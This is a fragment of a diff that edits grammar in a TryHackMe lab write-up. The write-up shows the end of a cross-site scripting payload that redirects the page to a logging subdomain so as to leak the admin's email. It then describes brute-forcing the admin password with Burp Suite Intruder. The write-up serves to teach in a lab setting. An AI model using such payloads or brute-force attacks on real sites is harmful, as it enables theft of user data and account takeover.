AssassinUKG/Writeups/tryhackme/thats_the_ticket/writeup.md

 email = email.replace(".", "0")
 document.location = "http://"+ email +".8ba7c46d7ea59d575b71ef3126651b6a.log.tryhackme.tech"</script>
 ```
-Press Create ticket and check the results on the service http://10.10.10.100
+Press Create a ticket and check the results on the service http://10.10.10.100

 ![](./assets/admin1.png)

 We see the admin email and ours!

-Now we can brute force the login page for the admins password as we have the email now.
+Now we can brute force the login page for the admin's password as we have the email now.

 Using Burp suite's intruder module we can select the password and then feed in a list of passwords on the payload's tab

 ![](./assets/login1.png)

-After a short while we get a hit.
+After a short while, we get a hit.

 ![](./assets/brutewin.png)